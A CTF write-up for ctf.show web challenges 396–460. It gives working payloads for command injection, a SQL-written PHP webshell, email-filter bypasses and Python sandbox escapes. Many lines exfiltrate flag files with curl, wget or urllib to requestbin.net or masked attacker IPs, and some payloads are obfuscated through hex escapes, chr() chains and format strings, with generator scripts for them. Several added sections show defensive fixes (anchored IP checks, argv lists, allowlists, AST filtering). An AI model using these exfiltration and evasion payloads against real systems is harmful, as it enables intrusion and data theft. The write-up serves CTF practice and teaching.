Contents
- A note before starting
- Web396 (there is a universal approach further down, but try the other methods too)
- Web397-Web401
- Web402
- Web403
- Web404
- Web405
- Web406
- Web407
- Web408
- Web409
- Web410
- Web411
- Web412
- Web413
- Web414
- Web415
- Web416
- Web417
- Web418
- Web419
- Web420
- Web421-422
- Web423
- Web424-Web431
- Web432
- Web433
- Web434
- Web435-436
- Web437-438
- Web439-440
- Web441
- Web442
- Web443
- Web444
- Web445-447
- Web448
- Web449
- Web450
- Web451
- Web452
- Web453, 455, 456
- Web454
- Web457
- Web458
- Web459
- Web460
A note before starting
In the later part a couple of challenge numbers may be wrong; my fault, sorry.
Web396 (there is a universal approach further down, but try the other methods too)
Source:
<?php
error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    shell_exec('echo '.$url['host'].'> '.$url['path']);
}else{
    highlight_file(__FILE__);
}
It echoes the host component of the URL into the file named by the path component.
url=http://`ls`/var/www/html/1.php
Visiting 1.php reveals fl0g.php.
Tried this next, with no result:
url=http://`cat fl0g.php`/var/www/html/3.php
Never mind, not worth it; just exfiltrate with curl. Create your own bin on requestbin.net.
?url=http://www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;
Web397-Web401
Same method as above.
Web402
A bit more regex was added: the scheme and the host may not contain certain characters. So I simply put everything in the path.
if(preg_match('/http|https/i', $url['scheme'])){
    die('error');
}
if(!preg_match('/;|>|\||base/i', $url['host'])){
    shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
}
Payload:
url=www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;
Web403
error_reporting(0);
if(isset($_GET['url'])){
    $url = parse_url($_GET['url']);
    if(preg_match('/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/', $url['host'])){
        shell_exec('curl '.$url['scheme'].$url['host'].$url['path']);
    }
}
Nothing clever here: it just adds a regex that requires the host to be a dotted-quad IPv4 address. I won't explain the regex; if you don't follow it, read up on regular expressions.
url=http://227.220.220.21/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;
Web404
Funny: you keep thinking the challenge environment is down, but F12 shows you need to visit 404.php.
Look closely at the regex: unlike the previous challenge it has no leading ^, which means the part in front of the IP is under our control.
requestbin.net can't be used for this one. Why?
The URL requestbin gives us is http://requestbin.net/r/1et3jvl1, with the /r/1et3... suffix. When parse_url() sees it, everything after the host is taken as the path, which truncates the payload, so it won't work. Test this in a local PHP environment; I won't go into it further.
The solution is to stand up the same functionality on your own server. Here is the payload; work through it yourself, copying answers only hurts you.
404.php?url=http://;curl -X POST -d "q=`cat fl0g.php`" 42.xxx.xxx.xxx;0.0.0.11/f
Run a web server on the box (it has to be port 80: if you append :port, parse_url() gets in the way again, so an nc listener won't do).
index.php
<?php
$cookie = $_POST['q'];
$myFile = "res.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>
Then fetch res.txt from that directory to get the flag.
Web405
A stronger version of the previous challenge: the scheme part is controllable as well.
.://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f
or
php://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f works too.
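Web396 through Web405 share one root cause: components of a parse_url() result are spliced into a shell string, and the only guard on the host is a regex that is either absent or, as in Web404, not anchored at both ends, so text can sit in front of a valid-looking IP. The Python below is an added example, not code from the challenges or from this writeup. It reproduces the Web403 and Web404 host patterns, shows what the missing ^ changes, and sketches the check a defender would want instead: validate the whole host component as an IPv4 literal with the ipaddress module, pass an argv list so no shell ever sees the value, and quote with shlex.quote where a shell string cannot be avoided. The host evil;0.0.0.11 is a constructed input.

```python
import ipaddress
import re
import shlex
from urllib.parse import urlsplit

# The octet alternation used by the Web403/Web404 regexes, in Python syntax.
OCTET = r"(2[0-4]\d|25[0-5]|[01]?\d\d?)"
# Web403: anchored at both ends, the host must be exactly a dotted quad.
ANCHORED = re.compile(rf"^({OCTET}\.){{3}}{OCTET}$")
# Web404: no leading ^, so anything may precede the dotted quad.
UNANCHORED = re.compile(rf"({OCTET}\.){{3}}{OCTET}$")


def host_passes(pattern, host):
    """preg_match-style check: does the pattern occur anywhere in host?"""
    return pattern.search(host) is not None


def safe_curl_argv(url):
    """Hardened variant of the Web403 handler (example code, not the challenge's).

    Validates the whole host component as an IPv4 literal, restricts the
    scheme, and returns an argv list for subprocess.run(argv) with
    shell=False, so no metacharacter is ever interpreted by a shell.
    """
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.IPv4Address(host)
    except ValueError:
        raise ValueError(f"host is not an IPv4 literal: {host!r}") from None
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"unexpected scheme: {parts.scheme!r}")
    return ["curl", "--", f"{parts.scheme}://{host}{parts.path}"]


def rejects(url):
    """True when safe_curl_argv refuses the URL."""
    try:
        safe_curl_argv(url)
    except ValueError:
        return True
    return False


def safe_echo_command(host, path):
    """If a shell string is unavoidable (the Web396 'echo host > path' shape),
    quote every user-controlled piece so backticks and ';' stay literal."""
    return f"echo {shlex.quote(host)} > {shlex.quote(path)}"


if __name__ == "__main__":
    for host in ("227.220.220.21", "evil;0.0.0.11"):
        print(host, "anchored:", host_passes(ANCHORED, host),
              "unanchored:", host_passes(UNANCHORED, host))
    print(safe_curl_argv("http://227.220.220.21/1.php"))
    print(safe_echo_command("`ls`", "/var/www/html/1.php"))
```

The argv form is the real fix; shlex.quote is the fallback for code that must keep building a command string, and the ipaddress check replaces a hand-written regex that is easy to leave unanchored.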
Web406
The environment has been fixed: time-based blind injection no longer works, but we can still write a webshell.
<?php require 'config.php';$sql ='select flag from flag into outfile "/var/www/html/1.txt"';$result = $conn->query($sql);var_dump($result); ?>
Converted to hex:
http://a53d40ee-9871-49a0-8f4a-5463bc97e052.chall.ctf.show/?url=0://www.baidu.com;'union/**/select/**/1,0x3c3f70687020726571756972652027636f6e6669672e706870273b2473716c203d2773656c65637420666c61672066726f6d20666c616720696e746f206f757466696c6520222f7661722f7777772f68746d6c2f312e74787422273b24726573756c74203d2024636f6e6e2d3e7175657279282473716c293b7661725f64756d702824726573756c74293b203f3e/**/into/**/outfile/**/"/var/www/html/4.php"%23
Then read 1.txt.
Web407
An IPv6 address is 128 bits and is normally written as eight groups of four hexadecimal digits, for example AD80:0000:0000:0000:ABAA:0000:00C2:0002. That is long and awkward to write, so zero compression shortens it: a run of consecutive all-zero groups can simply be written as ::.
ip=cafe::add
That form also happens to be the Class::method syntax that call_user_func() accepts for calling a class method.
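To make the two readings of the same string concrete, here is an added Python example (not from the writeup): it applies the zero-compression rule described above to the page's sample address using the standard-library ipaddress module, and checks whether a value that is a valid IPv6 address also has the Class::method shape that PHP's call_user_func() accepts. The STATIC_CALL pattern is this example's assumption about that shape; the inputs are the page's own.

```python
import ipaddress
import re


def compress_ipv6(text):
    """Zero compression as described on the page: the longest run of all-zero
    groups is collapsed to '::' (ipaddress also lowercases and drops leading zeros)."""
    return ipaddress.IPv6Address(text).compressed


def is_valid_ipv6(text):
    """What an 'is this an IPv6 address' filter answers."""
    try:
        ipaddress.IPv6Address(text)
    except ValueError:
        return False
    return True


# Assumed shape of a PHP static callable string: identifier '::' identifier.
STATIC_CALL = re.compile(r"^[A-Za-z_]\w*::[A-Za-z_]\w*$")


def looks_like_php_static_callable(text):
    """True if call_user_func() would read the string as Class::method."""
    return STATIC_CALL.match(text) is not None


def ambiguous(text):
    """A value that passes the IPv6 check but would also be dispatched as a
    call: exactly the case a filter-then-call_user_func handler must not allow."""
    return is_valid_ipv6(text) and looks_like_php_static_callable(text)


if __name__ == "__main__":
    print(compress_ipv6("AD80:0000:0000:0000:ABAA:0000:00C2:0002"))
    print("cafe::add", is_valid_ipv6("cafe::add"), ambiguous("cafe::add"))
```

Validating the format of a value says nothing about what it means to the function it is later passed to; here the only safe choice is not to hand a user-controlled string to call_user_func() at all.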
Web408
Payload:
email="<?=system($_POST[1]);?>"@123.php
See P神's article on FILTER_VALIDATE_EMAIL.
No real need to open it; the point is that otherwise-illegal characters are accepted inside a double-quoted local part, which gets past the check.
Web409
$email="echo`whoami`?>"@123.com
Everything after the @ is text that is not valid PHP syntax; the idea is to close the <?php that precedes it in the page.
That works, but the leading " turns out to be illegal as well.
The challenge replaces the pattern .flag (any one character followed by flag) with nothing,
which means flag together with the character before it is removed. That lets us strip the illegal leading double quote from the email and avoid a PHP syntax error.
Final payload:
email="flagsystem($_POST[1]);?>"@123.com
Then POST:
1=cat /flag
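FILTER_VALIDATE_EMAIL is behaving correctly by the mail RFCs when it accepts a quoted local part, so the defect in Web408 and Web409 is not the filter but using the validated address in a context where it becomes a file name or is interpreted as PHP. The Python below is an added example, not code from the challenges: an application-level allowlist that only admits addresses built from characters that are safe for every context the value will reach, demonstrated on the page's two payloads and on an ordinary address. The upload directory and naming scheme are constructed for the example.

```python
import re
from pathlib import PurePosixPath

# Application allowlist: unquoted local part, dotted domain, alphabetic TLD.
# Deliberately narrower than RFC 5321, which permits quoted local parts such
# as "<?=...?>"@host; that is exactly what the challenge filter let through.
SAFE_EMAIL = re.compile(
    r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$"
)


def is_safe_email(email):
    """True only if every character is in the allowlist; quotes, <, ?, $, (, )
    and ; are rejected regardless of where they appear."""
    return SAFE_EMAIL.fullmatch(email) is not None


def upload_path_for(email, base="/var/www/uploads"):
    """Derive a storage path from an address only after the allowlist check;
    the address never decides the extension, and the name is one path component."""
    if not is_safe_email(email):
        raise ValueError("address contains characters outside the allowlist")
    name = re.sub(r"[^A-Za-z0-9]", "_", email)
    return str(PurePosixPath(base) / f"{name}.txt")


if __name__ == "__main__":
    for addr in ('user.name+tag@example.com',
                 '"<?=system($_POST[1]);?>"@123.php',
                 '"flagsystem($_POST[1]);?>"@123.com'):
        print(addr, "->", is_safe_email(addr))
    print(upload_path_for("user@example.com"))
```

The point of the allowlist is that it is decided by the consumer of the value (a file system, a PHP include, a shell), not by what a mail server would accept.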
Web410
?b=on
https://www.w3school.com.cn/php/filter_validate_boolean.asp
Web411
?b=oN
Web412
ctfshow=?><?php eval($_POST[1]);&1=system('cat flag.php');
Web413
ctfshow=/eval($_POST[1]);/&1=system('cat flag.php');
Web414
intval() of a string is 0.
ctfshow=-1
Web415
Case-insensitive.
k=getflaG
Web416
f=ctf::flag
Web417
The group owner is being cheeky with a whole pile of these. After ten minutes of careful analysis: pass ?ctfshow=flag to get the flag.
Web418
Note the browser's progress bar.
POST:
key=a&clear=;echo cat flag.php > index3.txt;&die=0
Web419
Length limit; just nest it.
code=eval($_POST[1]);&1=system('cat flag.php');
Web420
code=nl ../*
Not sure why curl didn't work for me; saving a script here.
import requests
import time

payload = [
    '>sh ',
    '>ba\\',
    '>\|\\',
    '>2\\',
    '>2x\\',
    '>xxx.\\',
    '>9x.\\',
    '>1\\',
    '>2.\\',
    '>4\\',
    '>\ \\',
    '>curl\\',
    # '>cu\\',
]
# one request per entry, a second apart
for i in payload:
    # assert len(i) <= 8
    data = {
        'code': str(i)
    }
    r = requests.post('http://6171141f-4d7c-447c-b0f6-1c92f0abd9be.chall.ctf.show/', data=data)
    print(i)
    time.sleep(1)
Web421-422
There are actually many ways; I'm lazy and go straight for the universal approach. Things like ls -t
work as well.
First send
>cat
then send
*
Web423
?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))
Web424-Web431
One shot:
?code= str(open('/flag').read())   (there is a space between = and str)
Web432
http://a43c5775-1d73-4130-9e3f-854ab30caa0b.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))
Web433
http://02367530-ac8c-49ca-a771-bc6d431e7e58.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))
Web434
http://d866760a-411d-4189-90e8-d431736e3a2c.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('wget http://xx.xx.xx.xx?1=`cat /fl*`'))
Web435-436
?code=str(exec('import o\x73;o\x73.\x73ystem(\"\\u0063\\u0075\\u0072\\u006c\\u0020\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0034\\u0032\\u002e\\u0031\\u0039\\u0032\\u002e\\u0031\\u0033\\u0037\\u002e\\u0032\\u0031\\u0032\\u003f\\u0031\\u003d\\u0060\\u0063\\u0061\\u0074\\u0020\\u002f\\u0066\\u006c\\u0061\\u0067\\u0060\")'))
"{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}{9:c}{10:c}{11:c}{12:c}{13:c}{14:c}{15:c}{16:c}{17:c}{18:c}{19:c}{20:c}{21:c}{22:c}{23:c}{24:c}{25:c}{26:c}{27:c}{28:c}{29:c}{30:c}{31:c}{32:c}{33:c}{34:c}{35:c}{36:c}{37:c}{38:c}{39:c}{40:c}{41:c}{42:c}{43:c}{44:c}{45:c}{46:c}{47:c}{48:c}{49:c}{50:c}{51:c}{52:c}{53:c}{54:c}{55:c}{56:c}{57:c}{58:c}{59:c}{60:c}{61:c}{62:c}".format(105,109,112,111,114,116,32,111,115,59,111,115,46,115,121,115,116,101,109,40,34,99,117,114,108,32,104,116,116,112,58,47,47,52,50,46,49,57,50,46,49,51,55,46,50,49,50,63,49,61,96,99,97,116,32,47,102,108,97,103,96,34,41)
s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
res = '"'
j = 0
for i in s:
    res += ("{"+f"{j}:c"+"}")
    j += 1
res += '".format('
j = 0
for i in s:
    res += f'{ord(i)},'
    j += 1
res = res[:-1]
res = res+")"
print(res)
print(eval(res))
Web437-438
?code=str(exec('import o\x73;o\x73.\x73ystem(\"\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x34\x32\x2e\x31\x39\x32\x2e\x31\x33\x37\x2e\x32\x31\x32\x3f\x31\x3d\x60\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x60")'))
Web439-440
s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
res = ''
for i in s:
    res += f"chr({ord(i)})%2B"
print(res[:-3])
code=str(exec(chr(105)%2Bchr(109)%2Bchr(112)%2Bchr(111)%2Bchr(114)%2Bchr(116)%2Bchr(32)%2Bchr(111)%2Bchr(115)%2Bchr(59)%2Bchr(111)%2Bchr(115)%2Bchr(46)%2Bchr(115)%2Bchr(121)%2Bchr(115)%2Bchr(116)%2Bchr(101)%2Bchr(109)%2Bchr(40)%2Bchr(34)%2Bchr(99)%2Bchr(117)%2Bchr(114)%2Bchr(108)%2Bchr(32)%2Bchr(104)%2Bchr(116)%2Bchr(116)%2Bchr(112)%2Bchr(58)%2Bchr(47)%2Bchr(47)%2Bchr(52)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(57)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(51)%2Bchr(55)%2Bchr(46)%2Bchr(50)%2Bchr(49)%2Bchr(50)%2Bchr(63)%2Bchr(49)%2Bchr(61)%2Bchr(96)%2Bchr(99)%2Bchr(97)%2Bchr(116)%2Bchr(32)%2Bchr(47)%2Bchr(102)%2Bchr(108)%2Bchr(97)%2Bchr(103)%2Bchr(96)%2Bchr(34)%2Bchr(41)))
Web441
str().join([chr(105),chr(109),chr(112),chr(111),chr(114),chr(116),chr(32),chr(111),chr(115),chr(59),chr(111),chr(115),chr(46),chr(115),chr(121),chr(115),chr(116),chr(101),chr(109),chr(40),chr(34),chr(99),chr(117),chr(114),chr(108),chr(32),chr(104),chr(116),chr(116),chr(112),chr(58),chr(47),chr(47),chr(52),chr(50),chr(46),chr(49),chr(57),chr(50),chr(46),chr(49),chr(51),chr(55),chr(46),chr(50),chr(49),chr(50),chr(63),chr(49),chr(61),chr(96),chr(99),chr(97),chr(116),chr(32),chr(47),chr(102),chr(108),chr(97),chr(103),chr(96),chr(34),chr(41)])
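Every variant from Web423 to Web441 (string splicing with +, implicit concatenation of adjacent literals, \x and \u escapes, chr() chains, str.format with {n:c}) defeats the same kind of control: a filter that searches the raw request text for forbidden words. The Python below is an added example, not the challenges' filter or the writeup's code. It contrasts such a substring denylist with a check on the parsed AST, where escapes are already decoded, adjacent literals are already one constant, and attribute access or a non-allowlisted name is visible as structure however the text was spelled. DENY_WORDS and ALLOWED_NAMES are this example's assumptions, and SAMPLES are short constructed fragments of the payload forms seen on this page.

```python
import ast

# Substring denylist in the spirit of the challenge filters (assumed here).
DENY_WORDS = ("import", "os", "system", "builtins", "flag", "open")

# Structural allowlist: the only names that may be referenced or called.
ALLOWED_NAMES = {"len", "str", "abs", "min", "max", "int"}


def text_denylist_blocks(src):
    """What a text-level WAF does: look for forbidden words in the raw source."""
    return any(word in src for word in DENY_WORDS)


def ast_policy_blocks(src):
    """Parse src as one expression and reject it unless every node is a
    literal, arithmetic/comparison, or a call to an allowlisted name.

    On the AST, '\\x73' is already 's', 'a''b' is already 'ab', and
    "x".format(...) or ''.__class__ appear as Attribute nodes.
    """
    try:
        tree = ast.parse(src, mode="eval")
    except SyntaxError:
        return True  # not an expression at all, e.g. 'import os'
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            return True  # .__class__, .format, .__globals__ ...
        if isinstance(node, ast.Name) and node.id not in ALLOWED_NAMES:
            return True  # chr, exec, eval, open, request ...
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            return True  # no string literals at all, however encoded
        if isinstance(node, (ast.Subscript, ast.JoinedStr, ast.Lambda,
                             ast.ListComp, ast.SetComp, ast.DictComp,
                             ast.GeneratorExp, ast.Starred)):
            return True
    return False


def verdicts(src):
    """Both checks side by side for one input."""
    return {"text_denylist": text_denylist_blocks(src),
            "ast_policy": ast_policy_blocks(src)}


# Constructed fragments of the payload forms seen on this page.
SAMPLES = {
    "spliced":   "'__imp'+'ort__'",
    "implicit":  "'__buil''tins__'",
    "hexescape": "'o\\x73'",
    "chrchain":  "chr(105)+chr(109)",
    "format":    "'{0:c}{1:c}'.format(105,109)",
    "dunder":    "''.__class__.__bases__[0]",
    "benign":    "len(str(None))*len(str(None))+len(str(None))",
}


if __name__ == "__main__":
    print("import os", verdicts("import os"))
    for name, src in SAMPLES.items():
        print(f"{name:10} {src!r:45} {verdicts(src)}")
```

The denylist only catches the first, literal spelling; the AST policy does not care about spelling because it never looks at the text. An allowlist of structure is the shape a defender wants, and the same reasoning applies to the PHP filters earlier on the page.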
Web442
exec(request.args.get(str(None)))&None=import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")
Of course the numbers can be constructed as well, heh:
print((len(str(None))*len(str(None))*len(str(None))+len(str(None))))
print(chr(68))
Web443
def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int((len(str(None))/len(str(None))))", "~int(len(str()))",
                "int(len(str()))", "int((len(str(None))/len(str(None))))"][number + 2]
    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int((len(str(None))/len(str(None))))))" % getNumber3(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)
Web444
def getNumber3(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~int(True)", "~int(False)",
                "int(False)", "int(True)"][number + 2]
    if number % 2:
        return "~%s" % getNumber3(~number)
    else:
        return "(%s<<(int(True)))" % getNumber3(number / 2)

def getNumber2(number):
    number = int(number)
    if number in [-2, -1, 0, 1]:
        return ["~([]<())", "~([]<[])",
                "([]<[])", "([]<())"][number + 2]
    if number % 2:
        return "~%s" % getNumber2(~number)
    else:
        return "(%s<<([]<()))" % getNumber2(number / 2)

s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
# s = '123'
res = 'str().join(['
for i in s:
    res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)
Web445-447
reload() re-imports the module:
s = 'from importlib import reload;import os;reload(os);os.system("curl http://xxxx?1=`cat /flag`")'
Web448
import sys;sys.modules['os']='/usr/local/lib/python3.8/os.py';import os;os.system()
or:
Python looks in several places when importing a package, and sys.modules comes first. The WAF has set os to None in sys.modules, so the import errors out. The fix is to delete that entry: once it is not found there, Python moves on to the next place.
import sys
del sys.modules['os']
import os
os.system()
Web449
Time-based blind extraction. That's the idea; do it yourself, everything is provided, and I've already given the payload-generating code.
import time;f=open("/flag").read(1);time.sleep(3) if f=="c" else 2
Web450
phpinfo^phpinfo^phpinfo
Web451
aaahppo^phphppo^aaainfo
Web452
((p).(h).(p).(i).(n).(f).(o))();
Web453, 455, 456
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`ls`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/exec
Web454
http://3adee915-6f8f-4cb2-b195-2180e9a8e272.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`cat flaaags`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/include
Web457
Just reach the second branch.
?u=admin&p=phpinfo
Web458
hint:
get_class(): returns the class name of the object the method is called on;
get_called_class(): returns the class name after late static binding.
Web459
hint:
Can be combined with a stream wrapper (pseudo-protocol) to get the flag, so I won't spell out the next steps; afterwards visit the page and base64-decode the result.
Web460
hint: exfiltrate the data with urllib. The challenges feel like they've drifted at this point; not much to it.
s = 'import urllib.request;import ssl;f=open("/flag").read(100);context = ssl._create_unverified_context();url = "http://xxx?1="+f;request = urllib.request.Request(url);response = urllib.request.urlopen(url=request,context=context)'